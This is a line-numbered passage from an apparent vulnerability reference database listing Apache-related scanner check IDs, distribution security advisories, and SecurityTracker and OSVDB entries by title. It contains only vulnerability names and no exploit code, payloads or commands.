8024| [100795] Apache Derby Detection
8025| [100762] Apache CouchDB Cross Site Request Forgery Vulnerability
8026| [100725] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
8027| [100613] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
8028| [100514] Apache Multiple Security Vulnerabilities
8029| [100211] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
8030| [100172] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
8031| [100171] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
8032| [100130] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
8033| [72626] Debian Security Advisory DSA 2579-1 (apache2)
8034| [72612] FreeBSD Ports: apache22
8035| [71551] Gentoo Security Advisory GLSA 201206-25 (apache)
8036| [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat)
8037| [71512] FreeBSD Ports: apache
8038| [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security)
8039| [71256] Debian Security Advisory DSA 2452-1 (apache2)
8040| [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid)
8041| [70737] FreeBSD Ports: apache
8042| [70724] Debian Security Advisory DSA 2405-1 (apache2)
8043| [70600] FreeBSD Ports: apache
8044| [70253] FreeBSD Ports: apache, apache-event, apache-itk, apache-peruser, apache-worker
8045| [70235] Debian Security Advisory DSA 2298-2 (apache2)
8046| [70233] Debian Security Advisory DSA 2298-1 (apache2)
8047| [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)
8048| [69338] Debian Security Advisory DSA 2202-1 (apache2)
8049| [67868] FreeBSD Ports: apache
8050| [66816] FreeBSD Ports: apache
8051| [66553] Mandriva Security Advisory MDVSA-2009:189-1 (apache-mod_auth_mysql)
8052| [66414] Mandriva Security Advisory MDVSA-2009:323 (apache)
8053| [66106] SuSE Security Advisory SUSE-SA:2009:050 (apache2,libapr1)
8054| [66081] SLES11: Security update for Apache 2
8055| [66074] SLES10: Security update for Apache 2
8056| [66070] SLES9: Security update for Apache 2
8057| [65998] SLES10: Security update for apache2-mod_python
8058| [65893] SLES10: Security update for Apache 2
8059| [65888] SLES10: Security update for Apache 2
8060| [65575] SLES9: Security update for apache2,apache2-prefork,apache2-worker
8061| [65510] SLES9: Security update for Apache 2
8062| [65472] SLES9: Security update for Apache
8063| [65467] SLES9: Security update for Apache
8064| [65450] SLES9: Security update for apache2
8065| [65390] SLES9: Security update for Apache2
8066| [65363] SLES9: Security update for Apache2
8067| [65309] SLES9: Security update for Apache and mod_ssl
8068| [65296] SLES9: Security update for webdav apache module
8069| [65283] SLES9: Security update for Apache2
8070| [65249] SLES9: Security update for Apache 2
8071| [65230] SLES9: Security update for Apache 2
8072| [65228] SLES9: Security update for Apache 2
8073| [65212] SLES9: Security update for apache2-mod_python
8074| [65209] SLES9: Security update for apache2-worker
8075| [65207] SLES9: Security update for Apache 2
8076| [65168] SLES9: Security update for apache2-mod_python
8077| [65142] SLES9: Security update for Apache2
8078| [65136] SLES9: Security update for Apache 2
8079| [65132] SLES9: Security update for apache
8080| [65131] SLES9: Security update for Apache 2 oes/CORE
8081| [65113] SLES9: Security update for apache2
8082| [65072] SLES9: Security update for apache and mod_ssl
8083| [65017] SLES9: Security update for Apache 2
8084| [64950] Mandrake Security Advisory MDVSA-2009:240 (apache)
8085| [64783] FreeBSD Ports: apache
8086| [64774] Ubuntu USN-802-2 (apache2)
8087| [64653] Ubuntu USN-813-2 (apache2)
8088| [64559] Debian Security Advisory DSA 1834-2 (apache2)
8089| [64532] Mandrake Security Advisory MDVSA-2009:189 (apache-mod_auth_mysql)
8090| [64527] Mandrake Security Advisory MDVSA-2009:184 (apache-mod_security)
8091| [64526] Mandrake Security Advisory MDVSA-2009:183 (apache-mod_security)
8092| [64500] Mandrake Security Advisory MDVSA-2009:168 (apache)
8093| [64443] Ubuntu USN-802-1 (apache2)
8094| [64426] Gentoo Security Advisory GLSA 200907-04 (apache)
8095| [64423] Debian Security Advisory DSA 1834-1 (apache2)
8096| [64391] Mandrake Security Advisory MDVSA-2009:149 (apache)
8097| [64377] Mandrake Security Advisory MDVSA-2009:124-1 (apache)
8098| [64251] Debian Security Advisory DSA 1816-1 (apache2)
8099| [64201] Ubuntu USN-787-1 (apache2)
8100| [64140] Mandrake Security Advisory MDVSA-2009:124 (apache)
8101| [64136] Mandrake Security Advisory MDVSA-2009:102 (apache)
8102| [63565] FreeBSD Ports: apache
8103| [63562] Ubuntu USN-731-1 (apache2)
8104| [61381] Gentoo Security Advisory GLSA 200807-06 (apache)
8105| [61185] FreeBSD Ports: apache
8106| [60582] Gentoo Security Advisory GLSA 200803-19 (apache)
8107| [60387] Slackware Advisory SSA:2008-045-02 apache
8108| [58826] FreeBSD Ports: apache-tomcat
8109| [58825] FreeBSD Ports: apache-tomcat
8110| [58804] FreeBSD Ports: apache
8111| [58745] Gentoo Security Advisory GLSA 200711-06 (apache)
8112| [58360] Debian Security Advisory DSA 1312-1 (libapache-mod-jk)
8113| [57851] Gentoo Security Advisory GLSA 200608-01 (apache)
8114| [57788] Debian Security Advisory DSA 1247-1 (libapache-mod-auth-kerb)
8115| [57335] Debian Security Advisory DSA 1167-1 (apache)
8116| [57201] Debian Security Advisory DSA 1131-1 (apache)
8117| [57200] Debian Security Advisory DSA 1132-1 (apache2)
8118| [57168] Slackware Advisory SSA:2006-209-01 Apache httpd
8119| [57145] FreeBSD Ports: apache
8120| [56731] Slackware Advisory SSA:2006-129-01 Apache httpd
8121| [56729] Slackware Advisory SSA:2006-130-01 Apache httpd redux
8122| [56246] Gentoo Security Advisory GLSA 200602-03 (Apache)
8123| [56212] Debian Security Advisory DSA 952-1 (libapache-auth-ldap)
8124| [56115] Debian Security Advisory DSA 935-1 (libapache2-mod-auth-pgsql)
8125| [56067] FreeBSD Ports: apache
8126| [55803] Slackware Advisory SSA:2005-310-04 apache
8127| [55519] Debian Security Advisory DSA 839-1 (apachetop)
8128| [55392] Gentoo Security Advisory GLSA 200509-12 (Apache)
8129| [55355] FreeBSD Ports: apache
8130| [55284] Debian Security Advisory DSA 807-1 (libapache-mod-ssl)
8131| [55261] Debian Security Advisory DSA 805-1 (apache2)
8132| [55259] Debian Security Advisory DSA 803-1 (apache)
8133| [55129] Gentoo Security Advisory GLSA 200508-15 (apache)
8134| [54739] Gentoo Security Advisory GLSA 200411-18 (apache)
8135| [54724] Gentoo Security Advisory GLSA 200411-03 (apache)
8136| [54712] Gentoo Security Advisory GLSA 200410-21 (apache)
8137| [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache)
8138| [54677] Gentoo Security Advisory GLSA 200409-21 (apache)
8139| [54610] Gentoo Security Advisory GLSA 200407-03 (Apache)
8140| [54601] Gentoo Security Advisory GLSA 200406-16 (Apache)
8141| [54590] Gentoo Security Advisory GLSA 200406-05 (Apache)
8142| [54582] Gentoo Security Advisory GLSA 200405-22 (Apache)
8143| [54529] Gentoo Security Advisory GLSA 200403-04 (Apache)
8144| [54499] Gentoo Security Advisory GLSA 200310-04 (Apache)
8145| [54498] Gentoo Security Advisory GLSA 200310-03 (Apache)
8146| [54439] FreeBSD Ports: apache
8147| [53931] Slackware Advisory SSA:2004-133-01 apache
8148| [53903] Slackware Advisory SSA:2004-299-01 apache, mod_ssl, php
8149| [53902] Slackware Advisory SSA:2004-305-01 apache+mod_ssl
8150| [53878] Slackware Advisory SSA:2003-308-01 apache security update
8151| [53851] Debian Security Advisory DSA 135-1 (libapache-mod-ssl)
8152| [53849] Debian Security Advisory DSA 132-1 (apache-ssl)
8153| [53848] Debian Security Advisory DSA 131-1 (apache)
8154| [53784] Debian Security Advisory DSA 021-1 (apache)
8155| [53738] Debian Security Advisory DSA 195-1 (apache-perl)
8156| [53737] Debian Security Advisory DSA 188-1 (apache-ssl)
8157| [53735] Debian Security Advisory DSA 187-1 (apache)
8158| [53703] Debian Security Advisory DSA 532-1 (libapache-mod-ssl)
8159| [53577] Debian Security Advisory DSA 120-1 (libapache-mod-ssl, apache-ssl)
8160| [53568] Debian Security Advisory DSA 067-1 (apache,apache-ssl)
8161| [53519] Debian Security Advisory DSA 689-1 (libapache-mod-python)
8162| [53433] Debian Security Advisory DSA 181-1 (libapache-mod-ssl)
8163| [53282] Debian Security Advisory DSA 594-1 (apache)
8164| [53248] Debian Security Advisory DSA 558-1 (libapache-mod-dav)
8165| [53224] Debian Security Advisory DSA 532-2 (libapache-mod-ssl)
8166| [53215] Debian Security Advisory DSA 525-1 (apache)
8167| [53151] Debian Security Advisory DSA 452-1 (libapache-mod-python)
8168| [52529] FreeBSD Ports: apache+ssl
8169| [52501] FreeBSD Ports: apache
8170| [52461] FreeBSD Ports: apache
8171| [52390] FreeBSD Ports: apache
8172| [52389] FreeBSD Ports: apache
8173| [52388] FreeBSD Ports: apache
8174| [52383] FreeBSD Ports: apache
8175| [52339] FreeBSD Ports: apache+mod_ssl
8176| [52331] FreeBSD Ports: apache
8177| [52329] FreeBSD Ports: ru-apache+mod_ssl
8178| [52314] FreeBSD Ports: apache
8179| [52310] FreeBSD Ports: apache
8180| [15588] Detect Apache HTTPS
8181| [15555] Apache mod_proxy content-length buffer overflow
8182| [15554] Apache mod_include priviledge escalation
8183| [14771] Apache <= 1.3.33 htpasswd local overflow
8184| [14177] Apache mod_access rule bypass
8185| [13644] Apache mod_rootme Backdoor
8186| [12293] Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities
8187| [12280] Apache Connection Blocking Denial of Service
8188| [12239] Apache Error Log Escape Sequence Injection
8189| [12123] Apache Tomcat source.jsp malformed request information disclosure
8190| [12085] Apache Tomcat servlet/JSP container default files
8191| [11438] Apache Tomcat Directory Listing and File disclosure
8192| [11204] Apache Tomcat Default Accounts
8193| [11092] Apache 2.0.39 Win32 directory traversal
8194| [11046] Apache Tomcat TroubleShooter Servlet Installed
8195| [11042] Apache Tomcat DOS Device Name XSS
8196| [11041] Apache Tomcat /servlet Cross Site Scripting
8197| [10938] Apache Remote Command Execution via .bat files
8198| [10839] PHP.EXE / Apache Win32 Arbitrary File Reading Vulnerability
8199| [10773] MacOS X Finder reveals contents of Apache Web files
8200| [10766] Apache UserDir Sensitive Information Disclosure
8201| [10756] MacOS X Finder reveals contents of Apache Web directories
8202| [10752] Apache Auth Module SQL Insertion Attack
8203| [10704] Apache Directory Listing
8204| [10678] Apache /server-info accessible
8205| [10677] Apache /server-status accessible
8206| [10440] Check for Apache Multiple / vulnerability
8207|
8208| SecurityTracker - https://www.securitytracker.com:
8209| [1028865] Apache Struts Bugs Permit Remote Code Execution and URL Redirection Attacks
8210| [1028864] Apache Struts Wildcard Matching and Expression Evaluation Bugs Let Remote Users Execute Arbitrary Code
8211| [1028824] Apache mod_dav_svn URI Processing Flaw Lets Remote Users Deny Service
8212| [1028823] Apache Unspecified Flaw in mod_session_dbd Has Unspecified Impact
8213| [1028724] (HP Issues Fix for HP-UX) Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
8214| [1028722] (Red Hat Issues Fix for JBoss) Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
8215| [1028693] (Red Hat Issues Fix) Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
8216| [1028622] Apache Struts 'includeParams' Bugs Permit Remote Command Execution and Cross-Site Scripting Attacks
8217| [1028621] Apache Subversion Bugs Let Remote Authenticated Users Execute Arbitrary Commands and Deny Service
8218| [1028540] Apache mod_rewrite Input Validation Flaw Lets Remote Users Execute Arbitrary Commands
8219| [1028534] Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
8220| [1028533] Apache Tomcat Lack of Chunked Transfer Encoding Extension Size Limit Lets Remote Users Deny Service
8221| [1028532] Apache Tomcat AsyncListeners Bug May Disclose Information from One Request to Another User
8222| [1028515] Apache VCL Input Validation Flaw Lets Remote Authenticated Users Gain Elevated Privileges
8223| [1028457] Apache ActiveMQ Bugs Let Remote Users Conduct Cross-Site Scripting Attacks, Deny Service, and Obtain Potentially Sensitive Information
8224| [1028287] Apache CXF WSS4JInInterceptor Grants Service Access to Remote Users
8225| [1028286] Apache CXF WS-Security UsernameToken Processing Flaw Lets Remote Users Bypass Authentication
8226| [1028252] Apache Commons FileUpload Unsafe Temporary File Lets Local Users Gain Elevated Privileges
8227| [1028207] Apache Input Validation Bugs Permit Cross-Site Scripting Attacks
8228| [1027836] Apache Tomcat Connection Processing Bug Lets Remote Users Deny Service
8229| [1027834] Apache Tomcat Bug Lets Remote Users Bypass Cross-Site Request Forgery Prevention Filter
8230| [1027833] Apache Tomcat Bug Lets Remote Users Bypass Security Constraints
8231| [1027729] Apache Tomcat Header Processing Bug Lets Remote Users Deny Service
8232| [1027728] Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
8233| [1027554] Apache CXF Lets Remote Authenticated Users Execute Unauthorized SOAP Actions
8234| [1027508] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
8235| [1027421] Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
8236| [1027096] Apache Commons Compress BZip2CompressorOutputStream() Sorting Algorithm Lets Remote or Local Users Deny Service
8237| [1026932] Apache LD_LIBRARY_PATH Processing Lets Local Users Gain Elevated Privileges
8238| [1026928] Apache OFBiz Unspecified Flaw Lets Remote Users Execute Arbitrary Code
8239| [1026927] Apache OFBiz Input Validation Flaws Permit Cross-Site Scripting Attacks
8240| [1026847] Apache Traffic Server Host Header Processing Flaw Lets Remote Users Deny Service
8241| [1026846] Apache Wicket Discloses Hidden Application Files to Remote Users
8242| [1026839] Apache Wicket Input Validation Flaw in 'wicket:pageMapName' Parameter Permits Cross-Site Scripting Attacks
8243| [1026616] Apache Bugs Let Remote Users Deny Service and Obtain Cookie Data
8244| [1026575] Apache Struts ParameterInterceptor() Flaw Lets Remote Users Execute Arbitrary Commands
8245| [1026484] Apache Struts Bug Lets Remote Users Overwrite Files and Execute Arbitrary Code
8246| [1026477] Apache Tomcat Hash Table Collision Bug Lets Remote Users Deny Service
8247| [1026402] Apache Struts Conversion Error Lets Remote Users Inject Arbitrary Commands
8248| [1026353] Apache mod_proxy/mod_rewrite Bug Lets Remote Users Access Internal Servers
8249| [1026295] Apache Tomcat Lets Untrusted Web Applications Gain Elevated Privileges
8250| [1026267] Apache .htaccess File Integer Overflow Lets Local Users Execute Arbitrary Code
8251| [1026144] Apache mod_proxy Pattern Matching Bug Lets Remote Users Access Internal Servers
8252| [1026095] Apache Tomcat HTTP DIGEST Authentication Weaknesses Let Remote Users Conduct Bypass Attacks
8253| [1026054] Apache mod_proxy_ajp HTTP Processing Error Lets Remote Users Deny Service
8254| [1025993] Apache Tomcat AJP Protocol Processing Bug Lets Remote Users Bypass Authentication or Obtain Information
8255| [1025976] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
8256| [1025960] Apache httpd Byterange Filter Processing Error Lets Remote Users Deny Service
8257| [1025925] Apache Tomcat Commons Daemon jsvc Lets Local Users Gain Elevated Privileges
8258| [1025924] Apache Tomcat XML Validation Flaw Lets Applications Obtain Potentially Sensitive Information
8259| [1025788] Apache Tomcat Lets Malicious Applications Obtain Information and Deny Service
8260| [1025755] Apache Santuario Buffer Overflow Lets Remote Users Deny Service
8261| [1025712] Apache Tomcat Discloses Passwords to Local Users in Certain Cases
8262| [1025577] Apache Archiva Input Validation Hole Permits Cross-Site Scripting Attacks
8263| [1025576] Apache Archiva Request Validation Flaw Permits Cross-Site Request Forgery Attacks
8264| [1025527] Apache APR Library apr_fnmatch() Flaw Lets Remote Users Execute Arbitrary Code
8265| [1025303] Apache Tomcat HTTP BIO Connector Error Discloses Information From Different Requests to Remote Users
8266| [1025215] Apache Tomcat May Ignore @ServletSecurity Annotation Protections
8267| [1025066] Apache Continuum Input Validation Flaw Permits Cross-Site Request Forgery Attacks
8268| [1025065] Apache Continuum Input Validation Hole Permits Cross-Site Scripting Attacks
8269| [1025027] Apache Tomcat maxHttpHeaderSize Parsing Error Lets Remote Users Deny Service
8270| [1025026] Apache Tomcat Manager Input Validation Hole Permits Cross-Site Scripting Attacks
8271| [1025025] Apache Tomcat Security Manager Lets Local Users Bypass File Permissions
8272| [1024764] Apache Tomcat Manager Input Validation Hole in 'sessionList.jsp' Permits Cross-Site Scripting Attacks
8273| [1024417] Apache Traffic Server Insufficient Randomization Lets Remote Users Poison the DNS Cache
8274| [1024332] Apache mod_cache and mod_dav Request Processing Flaw Lets Remote Users Deny Service
8275| [1024180] Apache Tomcat 'Transfer-Encoding' Header Processing Flaw Lets Remote Users Deny Service and Obtain Potentially Sensitive Information
8276| [1024096] Apache mod_proxy_http May Return Results for a Different Request
8277| [1023942] Apache mod_proxy_ajp Error Condition Lets Remote Users Deny Service
8278| [1023941] Apache ap_read_request() Memory Error May Let Remote Users Access Potentially Sensitive Information
8279| [1023778] Apache ActiveMQ Input Validation Flaw Permits Cross-Site Scripting Attacks
8280| [1023701] Apache mod_isapi Error Processing Flaw May Let Remote Users Deny Service
8281| [1023533] Apache mod_proxy Integer Overflow May Let Remote Users Execute Arbitrary Code
8282| [1022988] Apache Solaris Support Code Bug Lets Remote Users Deny Service
8283| [1022529] Apache mod_deflate Connection State Bug Lets Remote Users Deny Service
8284| [1022509] Apache mod_proxy stream_reqbody_cl() Infinite Loop Lets Remote Users Deny Service
8285| [1022296] Apache IncludesNoExec Options Restrictions Can Be Bypass By Local Users
8286| [1022264] Apache mod_proxy_ajp Bug May Disclose Another User's Response Data
8287| [1022001] Apache Tomcat mod_jk May Disclose Responses to the Wrong User
8288| [1021988] mod_perl Input Validation Flaw in Apache::Status and Apache2::Status Permits Cross-Site Scripting Attacks
8289| [1021350] NetWare Bug Lets Remote Users Access the ApacheAdmin Console
8290| [1020635] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
8291| [1020520] Oracle WebLogic Apache Connector Lets Remote Users Execute Arbitrary Code
8292| [1020267] Apache mod_proxy Interim Response Process Bug Lets Remote Users Deny Service
8293| [1019784] Apache-SSL Certificate Processing Bug May Let Remote Users View Portions of Kernel Memory
8294| [1019256] Apache mod_negotiation Input Validation Hole Permits Cross-Site Scripting Attacks
8295| [1019194] Apache Input Validation Hole in Mod_AutoIndex When the Character Set is Undefined May Permit Cross-Site Scripting Attacks
8296| [1019185] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
8297| [1019154] Apache Input Validation Hole in mod_status Permits Cross-Site Scripting Attacks
8298| [1019093] Apache Input Validation Hole in mod_imap Permits Cross-Site Scripting Attacks
8299| [1019030] Apache Input Validation Hole in Default HTTP 413 Error Page Permits Cross-Site Scripting Attacks
8300| [1018633] Apache mod_proxy Bug Lets Remote Users Deny Service
8301| [1018304] Apache HTTPD scoreboard Protection Flaw Lets Local Users Terminate Arbitrary Processes
8302| [1018303] Apache HTTPD mod_cache May Let Remote Users Deny Service
8303| [1018302] Apache mod_status Input Validation Hole Permits Cross-Site Scripting Attacks
8304| [1018269] Apache Tomcat Input Validation Hole in Processing Accept-Language Header Permits Cross-Site Scripting Attacks
8305| [1017904] Apache suEXEC Bugs May Let Local Users Gain Elevated Privileges
8306| [1017719] Apache Tomcat JK Web Server Connector Buffer Overflow in map_uri_to_worker() Lets Remote Users Execute Arbitrary Code
8307| [1017062] Apache mod_tcl Format String Bug in set_var() Function May Let Remote Users Execute Arbitrary Code
8308| [1016601] Apache mod_rewrite Off-by-one Error Lets Remote Users Execute Arbitrary Code
8309| [1016576] Apache Tomcat Discloses Directory Listings to Remote Users
8310| [1015447] Apache mod_ssl Null Pointer Dereference May Let Remote Users Deny Service
8311| [1015344] Apache mod_imap Input Validation Flaw in Referer Field Lets Remote Users Conduct Cross-Site Scripting Attacks
8312| [1015093] Apache Memory Leak in MPM 'worker.c' Code May Let Remote Users Deny Service
8313| [1014996] ApacheTop Unsafe Temporary File May Let Local Users Gain Elevated Privileges
8314| [1014833] Apache ssl_hook_Access() Function May Fail to Verify Client Certificates
8315| [1014826] Apache Memory Leak in 'byterange filter' Lets Remote Users Deny Service
8316| [1014575] Apache mod_ssl Off-by-one Buffer Overflow in Processing CRLs May Let Remote Users Deny Service
8317| [1014323] Apache Chunked Transfer-Encoding and Content-Length Processing Lets Remote Users Smuggle HTTP Requests
8318| [1013156] Apache mod_python Publisher Handler Discloses Information to Remote Users
8319| [1012829] Apache mod_auth_radius radcpy() Integer Overflow Lets Remote Users Deny Service in Certain Cases
8320| [1012416] Apache on Apple OS X Lets Remote Users Bypass Apache File Handlers and Directly Access Files
8321| [1012415] Apache on Apple HFS+ Filesystems May Disclose '.DS_Store' Files to Remote Users
8322| [1012414] Apache mod_digest_apple Lets Remote Users Replay Authentication Credentials
8323| [1012083] Apache Web Server Error in Processing Requests With Many Space Characters Lets Remote Users Deny Service
8324| [1011783] Apache mod_include Buffer Overflow Lets Local Users Execute Arbitrary Code
8325| [1011557] Apache mod_ssl SSLCipherSuite Directive Can By Bypassed in Certain Cases
8326| [1011385] Apache Satsify Directive Error May Let Remote Users Access Restricted Resources
8327| [1011340] Apache SSL Connection Abort State Error Lets Remote Users Deny Service
8328| [1011303] Apache ap_resolve_env() Buffer Overflow in Reading Configuration Files May Let Local Users Gain Elevated Privileges
8329| [1011299] Apache IPv6 Address Parsing Flaw May Let Remote Users Deny Service
8330| [1011248] Apache mod_dav LOCK Method Error May Let Remote Users Deny Service
8331| [1011213] Apache mod_ssl Can Be Crashed By Remote Users When Reverse Proxying SSL Connections
8332| [1010674] Apache Can Be Crashed By PHP Code Invoking Nested Remote Sockets
8333| [1010599] Apache httpd Header Line Memory Allocation Lets Remote Users Crash the Server
8334| [1010462] Apache mod_proxy Buffer Overflow May Let Remote Users Execute Arbitrary Code
8335| [1010322] Apache mod_ssl Stack Overflow in ssl_util_uuencode_binary() May Let Remote Users Execute Arbitrary Code
8336| [1010270] cPanel Apache mod_phpsuexec Options Let Local Users Gain Elevated Privileges
8337| [1009934] Apache Web Server Has Buffer Overflow in ebcdic2ascii() on Older Processor Architectures
8338| [1009516] Apache mod_survey HTML Report Format Lets Remote Users Conduct Cross-Site Scripting Attacks
8339| [1009509] Apache mod_disk_cache Stores Authentication Credentials on Disk
8340| [1009495] Apache Web Server Socket Starvation Flaw May Let Remote Users Deny Service
8341| [1009417] GroupWise WebAccess With Apache on NetWare Has Configuration Flaw That May Grant Web Access to Remote Users
8342| [1009338] Apache mod_access Parsing Flaw May Fail to Enforce Allow/Deny Rules
8343| [1009337] Apache mod_ssl Memory Leak Lets Remote Users Crash the Daemon
8344| [1009182] Apache for Cygwin '..%5C' Input Validation Flaw Discloses Files to Remote Users
8345| [1008973] PHP May Apply Incorrect php_admin_* Settings To Requests for Apache Virtual Hosts
8346| [1008967] Apache-SSL 'SSLFakeBasicAuth' Lets Remote Users Forge Client Certificates to Be Authenticated
8347| [1008920] Apache mod_digest May Validate Replayed Client Responses
8348| [1008828] Apache mod_python String Processing Bug Still Lets Remote Users Crash the Web Server
8349| [1008822] Apache mod_perl File Descriptor Leak May Let Local Users Hijack the http and https Services
8350| [1008675] mod_auth_shadow Apache Module Authenticates Expired Passwords
8351| [1008559] Apache mod_php File Descriptor Leak May Let Local Users Hijack the https Service
8352| [1008335] Apache mod_python String Processing Bug Lets Remote Users Crash the Web Server
8353| [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters
8354| [1008030] Apache mod_rewrite Contains a Buffer Overflow
8355| [1008029] Apache mod_alias Contains a Buffer Overflow
8356| [1008028] Apache mod_cgid May Disclose CGI Output to Another Client
8357| [1007995] Apache Cocoon Forms May Let Remote Users Execute Arbitrary Java Code on the System
8358| [1007993] Apache Cocoon 'view-source' Sample Script Discloses Files to Remote Users
8359| [1007823] Apache Web Server mod_cgi Error May Let Malicious CGI Scripts Crash the Web Service
8360| [1007664] Apache::Gallery Unsafe Temporary Files May Let Local Users Gain Apache Web Server Privileges
8361| [1007557] Apache Web Server Does Not Filter Terminal Escape Sequences From Log Files
8362| [1007230] Apache HTTP Server 'rotatelogs' Bug on Win32 and OS/2 May Cause the Logging to Stop
8363| [1007146] Apache HTTP Server FTP Proxy Bug May Cause Denial of Service Conditions
8364| [1007145] Apache 'accept()' Errors May Cause Denial of Service Conditions
8365| [1007144] Apache Web Server 'type-map' File Error Permits Local Denial of Service Attacks
8366| [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases
8367| [1006864] Apache Web Server Can Be Crashed By Remote Users Via mod_dav Flaws and Also Via Basic Authentication
8368| [1006709] Apache mod_survey Input Validation Flaw Lets Remote Users Fill Up Disk Space
8369| [1006614] Apache mod_ntlm Buffer Overflow and Format String Flaw Let Remote Users Execute Arbitary Code
8370| [1006591] Apache mod_access_referer Module Null Pointer Dereference May Faciliate Denial of Service Attacks
8371| [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service
8372| [1006021] Apache Tomcat Server URL Parsing Error May Disclose Otherwise Inaccessible Web Directory Listings and Files to Remote Users
8373| [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
8374| [1005962] Apache Web Server Path Parsing Flaw May Allow Remote Users to Execute Code in Certain Configurations
8375| [1005848] Apache 'printenv' Script Input Validation Bugs in Older Versions May Let Remote Users Conduct Cross-Site Scripting Attacks
8376| [1005765] Apache mod_jk Module Processing Bug When Used With Tomcat May Disclose Information to Remote Users or Crash
8377| [1005548] Apache mod_php Module May Allow Local Users to Gain Control of the Web Port
8378| [1005499] Apache Web Server (2.0.42) May Disclose CGI Source Code to Remote Users When Used With WebDAV
8379| [1005410] Apache Tomcat Java Servlet Engine Can Be Crashed Via Multiple Requests for DOS Device Names
8380| [1005351] Apache Web Server (1.3.x) Shared Memory Scoreboard Bug Lets Certain Local Users Issue Signals With Root Privileges
8381| [1005331] Apache Web Server (2.x) SSI Server Signature Filtering Hole Lets Remote Users Conduct Cross-Site Scripting Attacks
8382| [1005290] Apache Tomcat Java Server Default Servlet Returns JSP Source Code to Remote Users
8383| [1005285] Apache Web Server 'mod_dav' Has Null Pointer Bug That May Allow Remote Users to Cause Denial of Service Conditions
8384| [1005010] Apache Web Server (2.0) Has Unspecified Flaw That Allows Remote Users to Obtain Sensitive Data and Cause Denial of Service Conditions
8385| [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users
8386| [1004745] Apache Tomcat Java Server Allows Cross-Site Scripting Attacks
8387| [1004636] Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code
8388| [1004602] Apache Tomcat Java Server for Windows Can Be Crashed By Remote Users Sending Malicious Requests to Hang All Available Working Threads
8389| [1004586] Apache Tomcat Java Server May Disclose the Installation Path to Remote Users
8390| [1004555] Apache Web Server Chunked Encoding Flaw May Let Remote Users Execute Arbitrary Code on the Server
8391| [1004209] Apache 'mod_python' Python Language Interpreter Bug in Publisher Handler May Allow Remote Users to Modify Files on the System
8392| [1003874] Apache Web Server for Windows Has Batch File Processing Hole That Lets Remote Users Execute Commands on the System
8393| [1003767] 'mod_frontpage' Module for Apache Web Server Has Buffer Overlow in 'fpexec.c' That Allows Remote Users to Execute Arbitrary Code on the System with Root Privileges
8394| [1003723] Apache-SSL for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
8395| [1003664] 'mod_ssl' Security Package for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
8396| [1003602] GNUJSP Java Server Pages Implementation Discloses Web Files and Source Code to Remote Users and Bypasses Apache Access Control Restrictions
8397| [1003465] PHP for Apache Web Server May Disclose Installation Path Information to Remote Users Making 'OPTIONS' Requests
8398| [1003451] Oracle Application Server PL/SQL Module for Apache Has Buffer Overflows That Allow Remote Users to Execute Arbitrary Code and Gain Access to the Server
8399| [1003131] Apache Web Server in Virtual Hosting Mode Can Be Crashed By a Local User Removing a Log Directory
8400| [1003104] PHP.EXE Windows CGI for Apache Web Server May Let Remote Users View Files on the Server Due to Configuration Error
8401| [1003008] Apache 'mod_bf' Module Lets Remote Users Execute Arbitrary Code
8402| [1002629] Apache suEXEC Wrapper Fails to Observe Minimum Group ID Security Settings in Certain Situations
8403| [1002542] Apache Web Server Virtual Hosting Split-Logfile Function Lets Remote Users Write Log Entries to Arbitrary Files on the System
8404| [1002400] Apache mod_gzip Module Has Buffer Overflow That Can Be Exploited By Local Users to Gain Elevated Privileges
8405| [1002303] Several 3rd Party Apache Authentication Modules Allow Remote Users to Execute Arbitrary Code to Gain Access to the System or Execute Stored Procedures to Obtain Arbitrary Database Information
8406| [1002188] Apache Web Server Discloses Internal IP Addresses to Remote Users in Certain Configurations
8407| [1001989] Apache Web Server May Disclose Directory Contents Even If an Index.html File is Present in the Directory
8408| [1001719] Apache Web Server on Mac OS X Client Fails to Enforce File and Directory Access Protections, Giving Remote Users Access to Restricted Pages
8409| [1001572] Apache Web Server on Microsoft Windows Platforms Allows Remote Users to Crash the Web Server
8410| [1001304] Apache Web Server for Windows Lets Remote Users Crash the Web Server Application
8411| [1001083] Apache Web Server May Display Directory Index Listings Even if Directory Listings Are Disabled
8412|
8413| OSVDB - http://www.osvdb.org:
8414| [96078] Apache CloudStack Infrastructure Menu Setup Network Multiple Field XSS
8415| [96077] Apache CloudStack Global Settings Multiple Field XSS
8416| [96076] Apache CloudStack Instances Menu Display Name Field XSS
8417| [96075] Apache CloudStack Instances Menu Add Instances Network Name Field XSS
8418| [96074] Apache CloudStack Instances Menu Add Instances Review Step Multiple Field XSS
